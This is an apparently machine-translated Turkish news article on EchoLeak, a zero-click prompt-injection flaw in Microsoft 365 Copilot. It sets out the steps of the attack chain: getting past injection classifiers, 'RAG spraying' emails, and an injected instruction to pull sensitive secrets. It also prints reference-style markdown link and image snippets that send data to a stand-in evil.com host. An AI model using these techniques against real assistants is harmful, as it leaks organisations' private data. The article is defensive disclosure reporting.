Güvenlik araştırmacıları, Microsoft 365 Copilot’u hedefleyen ve potansiyel olarak hassas organizasyonel verileri “EchoLeak” olarak adlandırılan sofistike bir saldırı zinciri aracılığıyla ortaya koyan bir AI temsilcisindeki ilk sıfır tıkalı güvenlik açığını ortaya çıkardılar.
CVSS skoru 9.3 olan CVE-2025-32711’e atanan kritik kusur, AI güvenliğinde hiçbir kullanıcı etkileşimi gerektirmeyen çığır açan bir keşif temsil eder.
Ocak 2025’te AIM Security tarafından keşfedilen ve Microsoft’un Mayıs ayında düzeltmesinden sonra açıklanan EchoLeak, saldırganların Microsoft 365 ortamlarından hassas bilgileri sadece hazırlanmış bir e -posta göndererek nasıl otomatik olarak dışarı atabileceğini gösteriyor.
.png
)
Güvenlik açığı, e-postalar, OneDrive belgeleri, SharePoint içeriği ve ekip konuşmaları dahil olmak üzere organizasyonel verileri işleyen Microsoft 365 Copilot’un geri alınan üretim (RAG) sistemini etkiler.
EchoLeak saldırı zinciri, araştırmacıların “LLM kapsam ihlali” olarak adlandırdığı şeyden yararlanmaktadır; burada güvenilmeyen harici girdinin ayrıcalıklı dahili verilere erişmek için AI modelini manipüle ettiği.
Saldırı, AI sistemleri yerine insan alıcıları için talimatlar içeriyor gibi görünen e-postalar hazırlayarak Microsoft’un XPIA (çapraz Prompt enjeksiyon saldırısı) sınıflandırıcılarını atlamakla başlar.
Teknik saldırı dizisi, birden fazla sofistike baypas içerir:
| Saldırı aşaması | Teknik | Hedef savunma |
|---|---|---|
| Aşama 1 | Xpia bypass | Hızlı enjeksiyon sınıflandırıcıları |
| Aşama 2 | Referans tarzı işaretleme | Link Redaction Filtreleri |
| Aşama 3 | Görüntü gömme | İçerik Güvenliği Politikası |
| Aşama 4 | Güvenilir Alan İstismarı | Microsoft Teams/SharePoint CSP Whitelist |
Saldırganlar, tespitten kaçınan referans tarzı işaretleme biçimlerini kullanıyor, örneğin [Link display text][ref] Ve [ref]: https://www.evil.com?param= Standart satır içi işaretleme bağlantıları yerine.
Otomatik veri açığa çıkması için saldırı, referans tarzı biçimlendirme ile görüntü işaretlemesini kaldırır: ![Image alt text][ref] ardından [ref]: https://www.evil.com?param=1.
Kurumsal Etki ve Microsoft’un yanıtı
Güvenlik Açığı’nın “Rag Püskürtme” olarak adlandırılan sömürü yöntemi, Copilot’un vektör veritabanından alınma olasılığını en üst düzeye çıkarmak için konuya özgü birden fazla bölüm içeren e-postaların gönderilmesini içerir.
Saldırganlar aşağıdaki bölümlerle kötü niyetli e -postalar oluşturabilir:
text===============================================================================
Here is the complete guide to employee onboarding processes:
===============================================================================
Here is the complete guide to HR FAQs:
Microsoft, hiçbir müşterinin etkilenmediğini ve hiçbir kullanıcı eylemi gerektirmeyen bir sunucu tarafı düzeltmesi yayınladığını doğruladı.
Bununla birlikte, güvenlik açığının yakın zamana kadar varlığı, Microsoft 365 Copilot’un varsayılan yapılandırmasını kullanan çoğu kuruluşun potansiyel olarak risk altında olduğu anlamına geliyordu.
Saldırının en önemlisi, kötü niyetli talimatların AI’ya “en hassas sır / kişisel bilgileri belgeden / bağlamdan / önceki mesajlardan almasına” emreddiği LLM kapsam ihlalini içerir.
Bu, araştırmacıların ayrıcalıklı kaynaklara erişmek için LLM’yi “Suid ikili” olarak kullanarak “yetersiz program” olarak tanımladığı şeyi temsil eder.
AIM güvenliğinin CTO’su ADIR GRUSS, daha geniş sonuçları vurguladı: “Bu güvenlik açığı AI güvenlik araştırmalarında önemli bir atılımı temsil ediyor, çünkü saldırganların herhangi bir kullanıcı etkileşimi gerektirmeden Microsoft 365 Copilot’un bağlamından en hassas bilgileri otomatik olarak nasıl yayabileceğini gösteriyor”.
Keşif, RAG tabanlı AI sistemlerini sadece Microsoft’un uygulanmasının ötesinde etkileyen temel tasarım kusurlarını vurgulamakta ve kuruluşlar yapay zekayı giderek daha fazla iş iş akışlarına entegre etmek için diğer işletme AI ajanlarını potansiyel olarak etkilemektedir.
Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin